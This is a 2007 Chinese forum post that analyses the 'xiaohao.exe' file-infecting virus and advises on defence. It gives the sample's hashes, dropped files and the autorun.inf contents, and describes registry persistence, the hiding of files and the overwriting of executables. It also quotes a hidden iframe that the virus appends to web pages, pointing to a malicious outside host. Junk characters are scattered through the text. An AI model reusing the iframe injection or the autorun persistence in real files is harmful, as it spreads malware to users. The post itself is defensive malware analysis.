|
|
File: C:\Documents and Settings\Administrator\桌面\xiaohao.exe
& X0 i8 n: I- t# m% a4 S; b- qSize: 12288 bytes4 [# P$ w' i) Y# [" k4 J/ {
File Version: 1, 0, 0, 1* o) ^7 V: L+ a2 k x# c3 Z
Modified: 2007年8月14日, 21:03:22
% Y8 a7 H6 w, D+ n' p" cMD5: B50ED06B61CDCF060D0136784999E50C
: D! }6 u! S* f3 XSHA1: ADFE561A7E12E6123C2E5E64EAE2308CBD4A79FD* d. o! Z* R/ [/ x9 G
CRC32: 5CC1E47A
% x5 p d9 p0 \8 b- _加壳方式:UPX 1 k- i( Q$ k- a( N9 W8 X: j W" E
病毒运行后:
M8 d; ?' h2 _3 q1.生成如下文件:
- f3 L9 v. q! w# b# ]! ?( p%SystemRoot%\system32\exloroe.exe
1 s( U3 x, ]! o. w ?1 f6 [. V) k每个分区下生成一个xiaohao.exe 和autorun.inf
; p, H& }6 C7 ?0 Q' W% j' G/ \autorun.inf内容
) s7 y6 G& N" p, h* z" i[Autorun]% f$ `: L1 e% N# G& J
open=Xiaohao.exe
: l( k. x2 q; b5 e6 q( u# m: b; |shellexecute=Xiaohao.exe, F* S( p% ]4 K2 M! f
shell\Auto\command=Xiaohao.exe
* i+ b; \# ~3 G" }2.添加注册表项目4 S- @( H0 m' z, h
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}& A/ B9 Q$ @7 q. B9 y
指向 %SystemRoot%\system32\exloroe.exe达到开机启动目的' y( M, z1 o9 K6 Q) b
3.修改注册表键值HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue为0x00000000* w1 Z1 A$ k# Q/ {
破坏显示隐藏文件6 t2 S: [; {7 p* T! ]" I1 B
删除HKU\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu23 [1 o! F6 }$ h9 U& Z" I
从而删除开始菜单中所有的快捷方式
- |4 d) D$ k7 O2 c$ u7 `4.感染文件0 a1 w3 D4 @3 Z6 U* Q* w3 D
从系统盘开始 查找所有*.exe的文件 将自身病毒体写入到正常文件中,被感染后的文件图标为一个表示有“浩”字的图标,病毒采取覆盖感染的方式,被感染的. j4 r+ A: J. X: W% A" }
exe无法修复
6 f* H6 Z& v( Z. Q从系统盘开始 查找所有*.jsp、*.php、*.aspx、*.asp、*.html、*.htm 在其尾部加入代码7 t- b7 b. b" O4 P' Q1 k- s
<iframe src=http://xiaohao.yona.biz/xiaohao.htm width=0 height=0></iframe>9 v ]" V% K- V2 W
所有感染的文件的文件名记录在C:\Jilu.txt里面( P! ^# S, Z# _; F& c, R3 c
并将所有未能感染的文件属性变为隐藏. b7 k7 z1 C9 l* U7 D
5.病毒运行时,所有窗口标题变为“已中毒,X14o-H4o's Virus”7 p1 f( @9 z' e! E" ~( j
6.系统时间改为2005年1月17日) {, l8 J0 g0 d$ m: W$ U
病毒作者将其QQ号码和博客公布于互联网上,以此炫耀自己的技术。作者的行为和原先的兔子病毒很相像,为了炫耀。# u* G% f, I, g+ X! T
由于病毒感染所有exe文件 所以重启以后可能会造成ntoskrnl.exe,ntkrnlpa.exe等核心启动文件被修改从而造成系统启动失败1 `6 }* _; k- f$ M
如果中了此类病毒 那么几乎等于判了死刑 必须重装系统 而且要将其他盘里面所有的*.exe,*.jsp、*.php、*.aspx、*.asp、*.html、*.htm 文件删掉# I1 i0 `2 e9 R# V$ @
希望大家注意如下几点防范此类病毒, }# K+ w Q( K) {, s4 @! K' K
1.安装还原精灵、冰点还原、雨过天晴等还原软件(没装还软软件的参考下两条) @- g% x2 w/ X7 `7 x, x- k' _
2.及时升级杀毒软件,防火墙,一定打全系统补丁" B% } Q3 L" ^" R. E
3.禁用U盘等移动设备的自动播放功能:在“开始”菜单的“运行”框中运行“gpedit.msc”命令,在“组策略”找到“计算机配置”和“用户配置”下的“管理模板”功能,打开其中的“系统”菜单中的“关闭自动播放”的设置,在其属性里面选择“已启用”,接着选择“所有驱动器”,最后确定保存即可 |
|
IP卡
狗仔卡
发表于 2007-9-16 09:33:42
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
楼主